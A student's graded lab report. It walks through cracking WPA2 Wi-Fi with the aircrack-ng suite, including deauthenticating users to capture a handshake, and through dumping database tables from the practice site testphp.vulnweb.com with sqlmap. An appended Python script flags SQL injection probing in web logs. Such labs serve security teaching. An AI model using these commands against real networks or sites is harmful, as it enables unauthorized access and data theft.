Graded LAB 2
Name: Kushagra Ojha SAP ID: 1000015336
1. Perform Wi-Fi password cracking of WPA-2 Security
enabled and document it well.
Step 1: Check Available Wireless Adapter
● Use the following command to check for available wireless adapters:
iwconfig
Step 2: Bring Down the Wireless Adapter
● To prepare the adapter for monitor mode, bring it down:
ifconfig wlan0 down
Step 3: Kill Conflicting Processes
● Ensure that no conflicting processes are running:
airmon-ng check kill
Step 4: Change Adapter Mode to Monitor
● Change the mode of your wireless adapter to monitor mode:
iwconfig wlan0 mode monitor
Step 5: Verify Mode Change
● Verify that the mode of your wireless adapter has been changed to
monitor:
iwconfig
Step 6: Enable the Interface
● Finally, bring the interface back up:
ifconfig wlan0 up
Note: Monitor mode allows you to capture network traffic, making it a crucial
step for ethical hacking tasks.
Step 1: Scan for Available Networks
● Use airodump-ng to scan for available networks:
airodump-ng --band abg wlan0
Step 2: Select the Target Network and Capture the WPA Handshake
● Use airodump-ng to capture the WPA handshake for the selected
network. Replace <mac> with the BSSID (MAC address) of the target
network and <channel> with the channel number:
airodump-ng --bssid <mac> --channel <channel> --write lab2 wlan0
Step 4: Deauthenticate Users
● Deauthenticate users on the target network to force a WPA handshake
capture:
aireplay-ng --deauth 0 -a <mac> wlan0
Step 5: Crack the WPA Password
● Use aircrack-ng to attempt to crack the captured WPA handshake using
a wordlist (replace <wordlist> with the path to your wordlist file):
aircrack-ng lab2-01.cap -w <wordlist>
Note: The wordlist should contain potential passwords to try for cracking the
WPA key.
This documentation outlines the steps involved in capturing a WPA
handshake and attempting to crack the password. Make sure to replace
<mac>, <channel>, and <wordlist> with the actual values you used during your
task.
2. Dump all the data over artists (vulnweb.com) and document
them properly.
Step 1: Execute SQLMap to Discover Databases
● Execute SQLMap with the target URL to identify databases on the target
server:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=3" --dbs
● As you can see from the result, there is only one database, so we will change
the target to http://testphp.vulnweb.com/listproducts.php?cat=1
● We will repeat the previous step on
http://testphp.vulnweb.com/listproducts.php?cat=1
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
● As you can see, we have two databases: acuart and
information_schema.
● We are going to check acuart:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables
● In the command above, -D stands for database, and in that database we are
going to check for all the tables.
● Now that we can see the tables in the database acuart, we are going to
check the table artists. We check for the columns in table artists:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T artists --columns
● Now that we know the database, the tables in that database, and all the
columns in that table, we dump all the data:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T artists -C adesc,aname,artist_id --dump
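Seen from the server side, the enumeration above leaves a recognizable trail in the web access log, because artist and cat are normally plain numeric IDs. The following is an added example, not part of the original lab: the log lines are constructed, and the function name flag_sqli and the keyword list are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the lab targets; both carry plain numeric IDs in normal use.
NUMERIC_PARAMS = {"artists.php": "artist", "listproducts.php": "cat"}
# Illustrative keyword list (an assumption, not exhaustive).
SQL_TOKENS = re.compile(r"(?i)\b(union|select|information_schema|sleep|benchmark)\b")
# Combined log format: ip - - [ts] "METHOD target HTTP/x" status size "referer" "agent"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 7880 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /listproducts.php?cat=1%20AND%201%3D1 HTTP/1.1" 200 7880 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /artists.php?artist=3 HTTP/1.1" 200 6251 "-" "Mozilla/5.0"
"""

def flag_sqli(log_text):
    """Return a list of (client_ip, reasons) for requests that look like SQLi probing."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, _method, target, _status, agent = m.groups()
        url = urlsplit(target)
        page = url.path.rsplit("/", 1)[-1]
        reasons = []
        if agent.lower().startswith("sqlmap/"):
            reasons.append("sqlmap user-agent")  # default agent; easily changed
        param = NUMERIC_PARAMS.get(page)
        values = parse_qs(url.query, keep_blank_values=True).get(param, []) if param else []
        for value in values:  # parse_qs has already percent-decoded the value
            if not value.isdigit():
                reasons.append(f"non-numeric {param}")
            if SQL_TOKENS.search(value):
                reasons.append("SQL keyword in parameter")
        if reasons:
            findings.append((ip, reasons))
    return findings

if __name__ == "__main__":
    for ip, reasons in flag_sqli(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The non-numeric check is the durable signal here; the user-agent match only catches a tool left on its defaults.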